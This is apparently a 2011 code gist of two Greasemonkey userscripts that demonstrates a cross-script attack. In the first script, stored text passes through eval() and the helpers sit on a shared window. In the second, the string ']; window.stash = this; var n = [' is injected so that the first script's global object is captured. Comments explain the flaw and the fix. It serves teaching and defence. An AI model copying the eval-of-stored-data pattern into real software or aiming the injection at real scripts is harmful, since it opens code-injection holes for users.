Created
February 10, 2011 17:31
An example of how a malicious script can target a careless script if the window object is shared between all scripts.
// ==UserScript== | |
// @name Careless Script | |
// @namespace http://test.free.fr | |
// @description A non-malicious script that saves and retrieves data carelessly. | |
// @include * | |
// ==/UserScript== | |
/**
 * Persist an array under `name` via GM_setValue, serialised with toString().
 *
 * Security note: the function is published on `window` and accepts any value
 * that has a toString() method, including a plain string, which is stored
 * unchanged. Where `window` is shared with other scripts, any of them can
 * call this helper and choose the stored text.
 *
 * @param {string} name - storage key handed to GM_setValue.
 * @param {Array} array - value to store; only its toString() output is kept.
 */
window.saveArray = function(name, array) {
  var serialized = array.toString();
  GM_setValue(name, serialized);
};
/**
 * Read the text stored under `name` and rebuild an array from it.
 *
 * SECURITY (review): the stored text is concatenated into source code and run
 * with eval(), so it is executed as JavaScript inside this script rather than
 * parsed as data. Because saveArray() stores whatever string it is given and
 * both helpers are published on `window`, the stored text is untrusted input
 * whenever `window` is shared with other scripts. Safer design: store
 * JSON.stringify(array), read it back with JSON.parse(), and keep the helpers
 * in a local scope instead of on `window`.
 *
 * @param {string} name - storage key handed to GM_getValue.
 * @returns {Array} the `data` variable declared by the evaluated text.
 */
window.getArray = function(name) {
  // Direct eval in non-strict code: the `var data` declared inside the string
  // becomes a local of this function, which is what the return below reads.
  eval('var data = [' + GM_getValue(name) + '];')
  return data;
};
// Seed the store with sample data as soon as the script runs.
var data = [1, 2, 3, 4, 5, 6, 7, 8, 9];
saveArray('data', data);

// On every mousedown in the document, reload the saved array through
// getArray() and show the sum of its elements. Each click therefore goes
// through getArray()'s eval of the stored text again.
document.addEventListener('mousedown', function() {
  var saved = getArray('data');
  var total = 0;
  var count = saved.length;
  var idx = 0;
  while (idx < count) {
    total += saved[idx];
    ++idx;
  }
  alert("Sum of saved data: " + total);
}, false);
// ==UserScript== | |
// @name Malicious Script | |
// @namespace http://test.free.fr | |
// @description A malicious script that targets a careless script and gains access to its GM api functions. | |
// @include * | |
// ==/UserScript== | |
/**
 * Demonstration: uses the other script's saveArray()/getArray() pair to get
 * code evaluated inside that script and to capture its global object.
 *
 * Defender's reading: this works only because getArray() eval()s the stored
 * text and because both helpers are reachable on a shared `window`. Parsing
 * the stored value as data (JSON.parse) or keeping the helpers off `window`
 * closes this path.
 *
 * @param {Function} [getArray] - the other script's getArray; when omitted,
 *     window.getArray is used.
 */
function exploit(getArray) {
  // No argument is passed when both helpers already exist on window.
  if (typeof getArray == "undefined")
    getArray = window.getArray;
  // A string is stored instead of an array. Wrapped by getArray() as
  // `var data = [` ... `];`, it ends the array literal early, leaves a
  // free-standing statement that copies `this` to window.stash, and opens a
  // second literal so that the combined text still parses.
  saveArray('mal', ']; window.stash = this; var n = [');
  // The other script now evaluates that stored text in its own scope.
  getArray('mal');
  var str = "";
  // List the property names reachable through the captured object.
  for (var i in window.stash)
    str += i + "\n";
  alert("A malicious script has obtained a reference\n" +
        "to the global object of another script. It now has\n" +
        "access to these global variables of that script:\n\n" + str);
}
// Entry point. Which branch runs depends on whether the other script's
// helpers are already visible as globals when this script starts.
// NOTE(review): both branches presuppose that scripts share `window`, as the
// gist description states.
if (typeof saveArray != "undefined" &&
    typeof getArray != "undefined") {
  // Both helpers already exist: run the demonstration immediately.
  exploit();
} else {
  // The helpers are not defined yet. The properties are created as null and
  // the non-standard Object.prototype.watch (Gecko-only, since removed from
  // Firefox) is borrowed so that a later assignment to window.getArray
  // invokes the callback below.
  window.saveArray = null;
  window.getArray = null;
  window.watch = Object.prototype.watch;
  window.watch('getArray', function(id, oldval, newval) {
    // newval is the function being assigned. It is handed to exploit()
    // directly and then returned unchanged as the value of the assignment.
    exploit(newval);
    return newval;
  });
}